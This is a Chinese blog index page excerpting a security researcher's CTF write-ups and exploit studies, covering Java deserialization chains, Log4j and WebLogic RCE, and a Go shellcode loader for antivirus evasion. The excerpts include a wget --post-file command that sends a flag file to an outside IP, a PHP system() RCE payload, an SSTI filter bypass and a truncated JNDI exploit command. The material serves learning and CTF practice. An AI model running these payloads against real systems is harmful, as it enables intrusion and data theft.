Le1a-CSDN博客

原创基于Go加载shellcode

这里通过TideSec的go免杀项目来从0开始学习首先导个包，需要用到如下几个包。io/ioutil 文件操作os 系统操作syscall syscall包含一个指向底层操作系统原语的接口unsafe Go指针的操作非常有限，仅支持赋值和取值，不支持指针运算，可以通过unsafe包来达到效果这里定义一下变量，然后需要通过syscall来加载两个dll，和ntdll.dll。然后这里有一个检查报错的函数，如果有报错就退出并打印报错信息。

2022-10-21 15:57:45 2354 3

原创 Java反序列化——C3P0

What is C3P0？C3P0是一个开源的JDBC连接池，它实现了数据源和JNDI绑定，支持JDBC3规范和JDBC2的标准扩展。使用它的开源项目有Hibernate、Spring等。可以看到中的通过来分割和。下面来看一下这个PoolSouce类这里除了一个构造方法用来赋值以外，还有一个方法，传入了我们的恶意的和序列化的时候，如果是不可序列化的，则会抛出异常然后尝试使用对其进行引用的封装，返回一个可以被序列化的实例对象。这里调用的也就是的方法这里就得到了构造的，并且传给了这个可序列化的

2022-10-21 15:56:19 2859 2

原创 MTCTF Writeup By Light1ng

下载附件，是一个flask框架，然后很明显的存在pickle反序列化，首先我们需要伪造session成为admin。爆破得到key为6284，现在就可以通过来伪造session。目前就成功伪造了session。接下来看看后面的反序列化逻辑。从session中获取ser_data键的值，然后替换掉一些字符，然后过滤R i o b,就没法用pker来生成payload了，这里直接手搓opcode了，然后现在只需要把这个base64编码一下，然后作为ser_data的值，写入session即可。

2022-10-21 15:55:18 821

原创 Shiro注入内存马

前段时间学习了在Shell中如何注入Filter型内存马，搞忘了写博客了，这里重新来记录一下过程。这里直接选择用CB链来打，CB链忘记了可以看前面的文章：https://www.le1a.com/posts/a5f4a9e3/

2022-10-21 15:53:45 2017

原创 Shiro无依赖链—Commons Beanutils

Shiro无依赖链—Commons Beanutils文章首发自: https://www.le1a.com/posts/a5f4a9e3/前言前面学习了CC6在Shiro当中的应用，但是很多场景没有使用CC依赖，那么还有其他利用方式吗?那就是Commons Beanutils！Commons Beanutils是什么？Commons-Beanutils是Apache提供的一个用于操作JAVA bean的工具包。里面提供了各种各样的工具类，让我们可以很方便的对bean对象的属性进行各种操作。Ja

2022-03-23 15:02:48 7353

原创 Commons-Collections3

Commons-Collections3文章首发自: https://www.le1a.com/posts/fb41fa9a/前言CC1和CC6都是用Runtime.exec()命令调用来执行命令。CC3、CC2、CC4这几个都是用的动态类加载来执行代码，动态类加载可以看之前发的文章: Java动态类加载漏洞分析使用动态类加载来执行代码，就需要用到defineClass类来处理字节码，将其处理为真正的Java类。但由于ClassLoader类里的defineClass都是protected属性，

2022-03-23 15:01:44 610 3

原创 TemplatesImpl在Shiro中的利用

TemplatesImpl在Shiro中的利用文章首发自: https://www.le1a.com/posts/6e876d26/前言前面学习了CC1、CC3和CC6，其中CC6是不限制版本的一条链，那么为什么还要用到TemplatesImpl这条链呢?不妨我们设想一下:命令执行和代码执行到底谁更有价值?例如在PHP中会遇到一个场景，call_user_func和eval都能造成的代码执行，而更多的人愿意使用eval，原因是call_user_func在某种情况下会被限制不能使用assert和sy

2022-03-23 15:00:23 3124

原创 Java动态类加载

Java动态类加载文章首发自: https://www.le1a.com/posts/9d41d3f8/前言前面学习了反序列化，正准备趁热打铁去学cc3了，但是发现cc3需要用到动态类加载，就先来学一下。利用URLClassLoader加载远程class文件首先了解下什么是ClassLoader?ClassLoader是一个"加载器"，它会让Java虚拟机知道如何加载这个类。默认的ClassLoader是根据类名来加载类的，这个类名必须是类的完整路径(跟反射有点类似)，例如java.lang.R

2022-03-23 14:59:23 5856

原创 Java动态代理

Java动态代理文章首发自: https://www.le1a.com/posts/9d41d3f8/案例模拟企业业务功能开发，并完成每个功能的性能统计需求:模拟某企业用户管理业务，需包含用户登录，用户删除，用户查询功能，并要统计每个功能的耗时。分析:定义一个UserService表示用户业务接口，规定必须完成用户登录，用户删除，用户查询功能。定义一个实现类UserServiceImpl实现UserService，并完成相关功能，且统计每个功能的耗时。定义测试类，创建实验类对象，调用

2022-03-23 14:57:02 2146

原创 Commons-Collections6分析

Java反序列化

2022-03-23 14:55:55 2157

原创浅谈Commons-Collections1 反序列化

Java CC链

2022-03-23 14:53:57 623

原创 Weblogic Rce CVE-2017-10271复现

Weblogic Rce CVE-2017-10271复现一、环境搭建使用vulhub来搭建，进入/weblogic/CVE-2017-10271文件夹，修改其中的docker-compose.yml文件，将8453端口打开使用docker-compose命令docker-compose up -d编译镜像并启动容器使用docker exec -it b3 /bin/bash命令进入容器内，自带的vi用得很不习惯，所以进去使用apt-get install nano命令安装一下nano然后使用

2022-01-27 18:59:56 1829

原创长安“战疫“网络安全赛Writeup

WebRCE_No_Para无参RCE?1=system('tac flag.php');&code=eval(current(current(get_defined_vars())));flaskadmin?static.js?然后发现传参点：?name=简单试了下SSTI，发现过滤了引号等符号考虑attr结合16进制来绕过{{a|attr(%27\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f%27)|attr(%27\x5f\x5f\x62\x6

2022-01-12 21:53:11 3937

原创 Log4j2_RCE漏洞复现

log4j2_RCE漏洞复现这里是用了两种工具来复现漏洞JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar方法靶机地址：http://vulfocus.fofa.so/工具地址：https://www.lanzoup.com/i8Aa4xo5gmf密码:Le1a访问靶机地址先把工具上传到VPS上，然后运行java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,(b

2021-12-16 18:09:33 2053

原创 2021年第四届“安洵杯”网络安全挑战赛Writeup

Misc应该算是签到B站搜索直接搜索这个BV号PS：出题人品味不错，我也喜欢酷玩的这首《Yellow》直接页面Ctrl+F没找出来搜索引擎找一下有没有通过API查弹幕的方法：https://www.bilibili.com/read/cv7923601F12点击Network，找到这个视频的cid从当前时间2021-11-27开始往前找https://api.bilibili.com/x/v2/dm/web/history/seg.so?type=1&oid=40043856

2021-11-28 14:48:20 9018 5

原创 [红明谷CTF 2021]write_shell

2021[ 红明谷CTF] write_shell[红明谷CTF 2021]write_shell进入题目，就给了源码，审计一下<?phperror_reporting(0);highlight_file(__FILE__);function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$inpu

2021-11-22 19:23:30 5870

原创 2021“西湖论剑“网络安全大赛Writeup

2021"西湖论剑"网络安全大赛Writeup我只写了自己做的部分，完整WP请访问下载：https://wwe.lanzoui.com/i2XlFwqd4gb密码:Le1aWeb详见fmyyy师傅：https://blog.csdn.net/fmyyy1/article/details/121451279?spm=1001.2014.3001.5501Misc真·签到扫码关注公众号，发送语音即可flag：DASCTF{welc0m3_t0_9C51s_2021}YUSA的小秘密

2021-11-21 13:46:30 9427 1

原创 2021年“深育杯“网络安全大赛Writeup

Misc签到题下载附件得到一张二维码扫码关注，后台回复签到即可获得flagflag：SangFor{AaKjtQr_OjJpdA3QwBV_ndsKdn3vPgc_}Login下载附件example.zip，打开是password.zip但是需要密码，尝试爆破此时发现了异常，打开明明只有一个password.zip文件，这里却检测到了两个加密文件，于是我们将压缩包用010 Editor打开分析一下发现有伪加密，将此处以及后面一处的09改为00，保存之后再打开压缩包发现多了两个

2021-11-15 08:48:15 1532 3

原创陇原战“疫“2021网络安全大赛Writeup

WebCheckIN源代码的这两处：先尝试访问/wget：/wget?argv=a，看出来这里应该是可以进行攻击的了接着尝试利用wget的--post-file进行数据外带，读取源代码在自己VPS开个监听并且构造：/wget?argv=a&argv=--post-file&argv=/flag&argv=http://1.14.92.24:8008/拿到flag：flag{6e6f4abf-f38c-4d30-8ccd-e0bc0012a13f}Misc

2021-11-08 14:35:24 6191 6

原创 2021年全国大学生网络安全邀请赛暨第七届“东华杯“上海市大学生网络安全大赛Writeup

2021年全国大学生网络安全邀请赛暨第七届"东华杯"上海市大学网格全大赛WriteupMisccheckin题目给了+AGYAbABhAGcAewBkAGgAYgBfADcAdABoAH0- 是UTF-7编码，解码得到flagflag为：flag{dhb_7th}project下载附件，解压之后发现这是道工控题目，但是解压之后里面有一个压缩包problem_bak.zip解压得到你来了~这里面一共有三段数据，第一段是base64编码6KGo5oOF5YyF5paH5YyW77y

2021-11-01 08:33:09 9701 7

原创 2021年“绿盟杯”重庆市大学生信息安全竞赛—Light1ng战队Writeup

2021年“绿盟杯”重庆市大学生信息安全竞赛—Light1ng战队Writeup其余方向Writeup详见pdf:https://wws.lanzoui.com/iWk1ovo0eaj密码:Le1aMiscMisc1:签到1题目给了一串base64编码解码得到flag：flag{c54ce9d7b4e17980dd4906d9941ed52a}Misc2：DECODER下载附件，打开得到3个txt，应该对应着三个部分的flagflag_1.txt: 042f38b694base

2021-10-23 16:22:10 2850 2

原创 2021年绿城杯Light1ng战队Writeup

Light1ng战队一、战队信息名称：Light1ng排名：16二、解题情况进不去平台了，没法截图了三、解题过程Web1.ezphpezphp在关于里看到个Git，所以考虑存在git泄露index.php里的php代码<?phpif (isset($_GET['link_page'])) { $link_page = $_GET['link_page'];} else { $link_page = "home";}$page_file = "pages/"

2021-09-30 09:20:57 3216

原创 DASCTF Sept X 浙江工业大学秋季挑战赛 Misc Girlfriend‘s account

Girlfriend’s account下载附件，得到一个excel表格，打开得到flag{账单总金额四舍五入保留至小数点后两位}，例如总金额为 543.21 元时，你需要提交 flag{543.21}也就是说这个excel是个账单，不仅有商品单价，还有购买商品的数量，flag就是计算账单的总额，也就是算他女朋友花了多少钱，然后保留两位小数。excel有函数可以计算乘法跟求和，但是这里并不是阿拉伯数字，所以我们接下来要做的就是把这个人民币的中文大写数字给转为阿拉伯数字。百度上查阅一下百度知道链

2021-09-26 20:14:28 336 2

原创记一次某理工大学getshell(证书站)

刚放假，闲的没事，就想着一边用Xray+rad配合红队师傅写的py脚本来批量挖掘edu漏洞py脚本地址:点击进入Xray地址：点击进入rad地址：点击进入使用详情请见 https://github.com/timwhitez/rad-xray连续扫了几天也没啥收获，最后去看了一下漏洞报告，发现了某理工大学旁站的一个备份文件访问 https://xxxx/backup.zip 下载备份文件意外在wp-config.php中发现了数据库配置信息，其中包含了数据库账号和密码并且发现了备份了数

2021-07-09 15:36:32 614

原创 0CTF/TCTF 2021 Quals_Misc_singer

Miscsinger下载附件打开得到一个文本文件从Csome-Official师傅的文章中得知，其文本内容除了=和,外，其他的是简谱音名没写完明天写

2021-07-07 00:33:20 361

原创 GKCTF2021 ✖ DASCTF应急挑战杯部分WP

Misc你知道apng吗下载附件得到girl.apng，用apngdis_gui分解得到每一帧的png图片分别在2，18，26发现二维码。其中18，26可以直接扫描得到-ad20和-0327-288a235370ea}。图片2是扭曲的二维码，但可以用ps拖正扫描得到flag{a3c7e4e5，最后在第十张图片的红色通道1中得到二维码扫描得到-9b9d,所以flag为 flag{a3c7e4e5-9b9d-ad20-0327-288a235370ea}银杏岛の奇妙冒险下载附件，打开exe，

2021-06-27 14:05:27 1061

原创 Bugku_Misc_答案

下载附件得到你明白吗？,用foremost分离得到一张图片和一个加密压缩包查看图片属性得到佛语论禅加密(点此进入解码网站)解码得到压缩包的密码为美乐蒂卡哇伊，打开压缩包得到password.txt和加密的压缩包答案.zip打开password.txt得到两列数字，在最下方提示了青花这首歌这两列数字猜测应该对应着歌词，前面的数字代表是多少行，后面的数字代表是第几个全部对照转换完得到密码三匆爱温蒙惚心信承失记愈的逢过濡善着记回寞神梦，打开密码.zip得到一张图片用010 Editor打开

2021-06-12 22:59:54 439 4

原创 DASCTF_Misc_holmes

下载附件得到一张福尔摩斯的图片上面有跳舞小人加密，通过对照表解密得到YOUAREHOLMES用Foremost分离得到一个压缩包，用刚刚得到的YOUAREHOLMES作为密码解压得到一个python文件，打开得到一个程序flag="flag{********************************}"encflag=[]for i in range(len(flag)): encflag.append((ord(flag[i])+i)%128)print(encflag)'

2021-05-29 20:39:50 316

原创 Bugku_Misc_where is flag 2

下载打开附件压缩包，里面15个txt文件，以及一个图片我一直在尝试打开这个压缩包，也试过爆破，发现不行，压缩包用010打开也没有什么发现。既然常规思路不行，那就换个思路，像上题一样，文件内容没啥用，这题我们注意观察文件名，发现是十六进制，利用文件的CRC32转换ascii码(图片的CRC32不用)十五个文件的CRC32连起来，进入用十六进制转ascii，就得到了flag得到flag为 bugku{You_can't_imagine_the_happiness_of_hiding_the_flag!!

2021-05-20 20:14:39 952

Le1a's Blog